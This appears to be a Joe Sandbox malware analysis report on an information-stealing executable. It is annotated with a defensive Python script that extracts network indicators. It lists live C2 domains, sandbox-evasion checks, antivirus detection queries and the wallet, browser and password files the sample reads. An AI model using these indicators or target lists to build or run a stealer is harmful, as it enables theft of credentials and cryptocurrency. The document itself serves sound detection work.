Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: C:\Users\user\Desktop\filename.exe Code function: 0_2_00431E20 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard
Source: C:\Users\user\Desktop\filename.exe Code function: 0_2_0043302F GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt
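The C2 URL above surfaces in memory with trailing junk (.../api%H, .../apiDX, .../apice) and once with an explicit :443, while the Steam, Mozilla and Google URLs are browser data the stealer was reading rather than attacker infrastructure. The following Python script is an added example, not Joe Sandbox tooling and not part of this report, that turns such evidence lines into a de-duplicated IOC list: it canonicalises each URL, folds junk-suffixed variants onto the shortest observed form, counts how many distinct memory dumps support each endpoint, and pairs the TLS sessions with their server IPs. SAMPLE_LINES is a constructed subset of the report's own lines, kept in the page's run-together form so that the regexes tolerate the missing separators.

```python
"""Turn Joe Sandbox "Source:" evidence lines into a de-duplicated network IOC list.

Added example for this report; it is not Joe Sandbox tooling and not part of the
original page. A memory-string scanner reads past a string's terminator, so one
URL shows up as ".../api", ".../api%H", ".../apiDX"; collapse_variants() folds
such junk-suffixed forms onto the shortest observed URL.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, urlunsplit

# Constructed subset of the report's own evidence lines, kept in the page's
# run-together form ("...sdmpString found", "unknownHTTPS traffic").
SAMPLE_LINES = [
    "Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1468834713.00000000009BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api",
    "Source: filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api%H",
    "Source: filename.exe, 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api.",
    "Source: filename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiDX",
    "Source: filename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apixO",
    "Source: filename.exe, 00000000.00000002.1532096286.0000000000945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api",
    "Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/",
    "Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges",
    "Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/",
    "Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/",
    "Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.3:49745 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49754 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49762 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49773 version: TLS 1.2",
]

URL_RE = re.compile(r"String found in binary or memory:\s*(https?://\S+)")
DUMP_RE = re.compile(r"(\S+?)\.sdmp")  # memory-dump identifier naming each source
TLS_RE = re.compile(
    r"HTTPS traffic detected:\s*([\d.]+):(\d+)\s*->\s*([\d.]+):(\d+)\s*version:\s*(TLS [\d.]+)"
)


def canonical(url):
    """Lower-case the host and drop an explicit default port, so that
    https://h:443/p and https://h/p compare as the same endpoint."""
    p = urlsplit(url)
    default = 443 if p.scheme == "https" else 80
    netloc = p.hostname if p.port in (None, default) else f"{p.hostname}:{p.port}"
    return urlunsplit((p.scheme, netloc, p.path, p.query, ""))


def collapse_variants(urls, max_junk=2):
    """Return {url: base}. A URL becomes a variant of an already-accepted,
    shorter base when it extends that base by 1..max_junk characters that
    contain neither '/' nor '?' (a real sub-path or query stays separate)."""
    base_of = {}
    for u in sorted(set(urls), key=lambda s: (len(s), s)):
        base = u
        for k, kb in base_of.items():
            extra = u[len(k):]
            if (k == kb and u.startswith(k) and 0 < len(extra) <= max_junk
                    and not set(extra) & set("/?")):
                base = k
                break
        base_of[u] = base
    return base_of


def extract_iocs(lines):
    """Parse evidence lines into endpoints (with supporting dumps) and TLS sessions."""
    seen = []                # (canonical url, dump ids named on that line)
    tls = defaultdict(list)  # (server ip, server port, version) -> client ports
    for line in lines:
        m = URL_RE.search(line)
        if m:
            seen.append((canonical(m.group(1)), DUMP_RE.findall(line)))
        m = TLS_RE.search(line)
        if m:
            srv, sport, _cli, cport, ver = m.groups()
            tls[(srv, int(sport), ver)].append(int(cport))
    base_of = collapse_variants(u for u, _ in seen)
    endpoints = {}
    for url, dumps in seen:
        e = endpoints.setdefault(base_of[url],
                                 {"observations": 0, "variants": set(), "dumps": set()})
        e["observations"] += 1
        e["variants"].add(url)
        e["dumps"].update(dumps)
    return {"endpoints": endpoints, "tls": dict(tls)}


if __name__ == "__main__":
    result = extract_iocs(SAMPLE_LINES)
    for url, e in sorted(result["endpoints"].items(),
                         key=lambda kv: -kv[1]["observations"]):
        print(f"{e['observations']:2d} hits in {len(e['dumps'])} dumps  {url}")
    for (ip, port, ver), cports in result["tls"].items():
        print(f"{ip}:{port} {ver}  sessions={len(cports)} client_ports={cports}")
```

Only suffixes of at most two characters containing neither / nor ? are folded, so https://store.steampowered.com/about/ stays distinct from https://store.steampowered.com/ and the https://sputnik-1985.com/api variants collapse to one endpoint backed by six dumps. Strings such as https://www.mozilla.org/privacy/firefox/gro.allizom.www. are a URL run together with the reversed-host value (rev_host) that Firefox keeps in places.sqlite, a sign that the sample had that database open, not a second endpoint; they are not folded either. The Steam profile URLs for id 76561199724331900 look like links from a fetched profile page, which is consistent with the Steam-profile dead-drop resolver Lumma is documented to use for its C2 domain, but the strings alone do not show what that page served.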

System Summary

Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\Desktop\filename.exe Code function (94 functions in the on-disk image, 0x00402EE0 to 0x0043F780): 0_2_0043B1A0, 0_2_00437A70, 0_2_0040E2CE, 0_2_00420B40, 0_2_00410B7A, 0_2_00425B20, 0_2_00422BF0, 0_2_004375F0, 0_2_0040E672, 0_2_0043EE70, 0_2_0040D693, 0_2_00408710, 0_2_0040AF30, 0_2_0043F780, 0_2_00426050, 0_2_0041E070, 0_2_0042C875, 0_2_0042707B, 0_2_00418008, 0_2_00421810, 0_2_00426030, 0_2_004208C5, 0_2_004288D0, 0_2_004188D8, 0_2_004300E0, 0_2_004268B3, 0_2_0041F140, 0_2_0041C950, 0_2_0041D960, 0_2_00405920, 0_2_0042E92B, 0_2_0043F130, 0_2_0042E13D, 0_2_00439187, 0_2_004251A0, 0_2_004351A5, 0_2_00412200, 0_2_00431A10, 0_2_00415A36, 0_2_0043BAC0, 0_2_0043DAC5, 0_2_0040CACB, 0_2_004082D0, 0_2_004062E0, 0_2_0040AA80, 0_2_00427AB8, 0_2_00429340, 0_2_0042834B, 0_2_00438360, 0_2_00408B70, 0_2_00423300, 0_2_004093A0, 0_2_0043F450, 0_2_00427458, 0_2_0042BC5E, 0_2_0043E462, 0_2_00436467, 0_2_00417C6C, 0_2_00404C00, 0_2_00414C22, 0_2_0043E4D0, 0_2_00436D40, 0_2_00407550, 0_2_0043DD72, 0_2_0042BD05, 0_2_00422522, 0_2_004235C0, 0_2_00419DD0, 0_2_0041D650, 0_2_00415660, 0_2_0041CE60, 0_2_0041DE20, 0_2_00424E30, 0_2_0043E630, 0_2_00418EC7, 0_2_00402EE0, 0_2_0043E6E0, 0_2_00421EEF, 0_2_00428EFC, 0_2_00411E97, 0_2_0041FEA5, 0_2_0043B6B0, 0_2_00405F40, 0_2_00439750, 0_2_00406770, 0_2_0043E770, 0_2_0041170F, 0_2_00423710, 0_2_00415F3C, 0_2_004097C0, 0_2_004357D3, 0_2_0042AF80, 0_2_00436FA0, 0_2_004387A0
Source: C:\Users\user\Desktop\filename.exe Code function (72 functions in dynamically allocated memory, 0x02473B77 to 0x024AF9E7, i.e. inside the 0x02470000 region in which the Windows_Trojan_Smokeloader_3687686f rule matched above): 0_2_024A7207, 0_2_0249221E, 0_2_0248E2D7, 0_2_02488284, 0_2_024A0347, 0_2_024AF397, 0_2_0249E3A4, 0_2_0248F3A7, 0_2_0248A037, 0_2_0248D0C7, 0_2_024AF0D7, 0_2_0248E087, 0_2_02495097, 0_2_0249B1E7, 0_2_024761A7, 0_2_02498669, 0_2_02479607, 0_2_024A66CE, 0_2_024AF6B7, 0_2_024A8734, 0_2_024777B7, 0_2_02482467, 0_2_024A540C, 0_2_024AB407, 0_2_02476547, 0_2_0248654C, 0_2_02474527, 0_2_02478537, 0_2_0247E535, 0_2_024995A7, 0_2_02491A77, 0_2_024A8A07, 0_2_02493A07, 0_2_02479A27, 0_2_024A5A3A, 0_2_0249CADC, 0_2_02473B77, 0_2_02486B2D, 0_2_02490B2C, 0_2_024AEB37, 0_2_0248DBC7, 0_2_02475B87, 0_2_0249EB92, 0_2_0248CBB7, 0_2_024A7857, 0_2_0247E8D9, 0_2_0247D8FA, 0_2_0248C8AA, 0_2_0248D8B7, 0_2_02478977, 0_2_02481976, 0_2_024AB917, 0_2_024769D7, 0_2_024AF9E7, 0_2_024A99B7, 0_2_02474E67, 0_2_0249BEC5, 0_2_02487ED3, 0_2_0249BF6C, 0_2_024ADFD9, 0_2_024A6FA7, 0_2_024A1C77, 0_2_024A7CD7, 0_2_0247ACE7, 0_2_02485C9D, 0_2_024ADD2C, 0_2_024ABD27, 0_2_0247CD32, 0_2_02478DD7, 0_2_02480DE1, 0_2_02495D87, 0_2_02490DA7
Source: C:\Users\user\Desktop\filename.exe Code function: String function: 004080E0 appears 46 times
Source: C:\Users\user\Desktop\filename.exe Code function: String function: 02478347 appears 75 times
Source: C:\Users\user\Desktop\filename.exe Code function: String function: 00414910 appears 78 times
Source: C:\Users\user\Desktop\filename.exe Code function: String function: 02484B77 appears 78 times
Source: C:\Users\user\Desktop\filename.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 1856
Source: filename.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Note: both hits are Elastic community rules that matched in process memory only (the 0x02470000 region and the 0x008DA000 region, near which the module-enumeration routine 0_2_008DB1B6 also appears), not in the file on disk. The family verdict in the overview rests on the extracted configuration and the LummaC rule; generic rules keyed on shared loader or packer code commonly fire across families, so these two matches should be read as evidence of unpacked code, not as a second or third family.
Source: filename.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@2/5@13/2
Source: C:\Users\user\Desktop\filename.exe Code function: 0_2_008DB1B6 CreateToolhelp32Snapshot,Module32First
Source: C:\Users\user\Desktop\filename.exe Code function: 0_2_00437A70 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7512
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\4e21d42a-5cb6-4a6b-955d-a527006430ff
Source: filename.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\filename.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: filename.exe, 00000000.00000003.1423889435.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1407329170.0000000003063000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1413730651.0000000003045000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1423730983.0000000003046000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: filename.exe Virustotal: Detection: 52%
Source: filename.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\filename.exe File read: C:\Users\user\Desktop\filename.exe
Source: unknown Process created: C:\Users\user\Desktop\filename.exe "C:\Users\user\Desktop\filename.exe"
Source: C:\Users\user\Desktop\filename.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 1856
Source: C:\Users\user\Desktop\filename.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\filename.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\filename.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

Data Obfuscation

Source: C:\Users\user\Desktop\filename.exe | Unpacked PE file: 0.2.filename.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\filename.exe | Unpacked PE file: 0.2.filename.exe.400000.0.unpack
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_00447249 push esp; ret 0_2_004472A0
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_0043E340 push eax; mov dword ptr [esp], EDECF322h 0_2_0043E342
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_00444B64 pushfd ; retf 0079h 0_2_00444B65
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_00444E18 pushfd ; retf 0079h 0_2_00444E19
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_008DDBC3 pushad ; ret 0_2_008DDBC4
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_008DFB00 pushad ; ret 0_2_008DFB01
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_008DC731 push 892C0500h; iretd 0_2_008DC737
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_024AE5A7 push eax; mov dword ptr [esp], EDECF322h 0_2_024AE5A9
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_02497E08 push cs; retf 0_2_02497E09
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_0247DEFC push ebx; retf 0_2_0247DF0A
Source: filename.exe | Static PE information: section name: .text entropy: 7.3851056058800415
Source: C:\Users\user\Desktop\filename.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences in the report)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 occurrences in the report)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\filename.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filename.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\filename.exe TID: 7600 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\filename.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: Amcache.hve.4.dr | Binary or memory string: VMware
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: filename.exe, 00000000.00000002.1532096286.0000000000916000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395609830.0000000000960000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532096286.000000000095B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395777943.0000000000966000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr | Binary or memory string: VMware-42 27 9c 31 6b 7d 78 89-be 90 b3 22 a5 ab 1b 52
Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\filename.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_0043CCE0 LdrInitializeThunk, 0_2_0043CCE0
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_008DAA93 push dword ptr fs:[00000030h] 0_2_008DAA93
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_0247092B mov eax, dword ptr fs:[00000030h] 0_2_0247092B
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_02470D90 mov eax, dword ptr fs:[00000030h] 0_2_02470D90

HIPS / PFW / Operating System Protection Evasion

Source: filename.exe | String found in binary or memory: bashfulacid.lat
Source: filename.exe | String found in binary or memory: tentabatte.lat
Source: filename.exe | String found in binary or memory: curverpluch.lat
Source: filename.exe | String found in binary or memory: talkynicer.lat
Source: filename.exe | String found in binary or memory: shapestickyr.lat
Source: filename.exe | String found in binary or memory: manyrestro.lat
Source: filename.exe | String found in binary or memory: slipperyloo.lat
Source: filename.exe | String found in binary or memory: wordyfindy.lat
Source: filename.exe | String found in binary or memory: enterwahsh.biz
Source: C:\Users\user\Desktop\filename.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\filename.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: filename.exe, 00000000.00000003.1459281538.00000000009B7000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532096286.000000000095B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\filename.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: filename.exe PID: 7512, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/JAXX New Version
Source: filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet (2 occurrences in the report)
Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
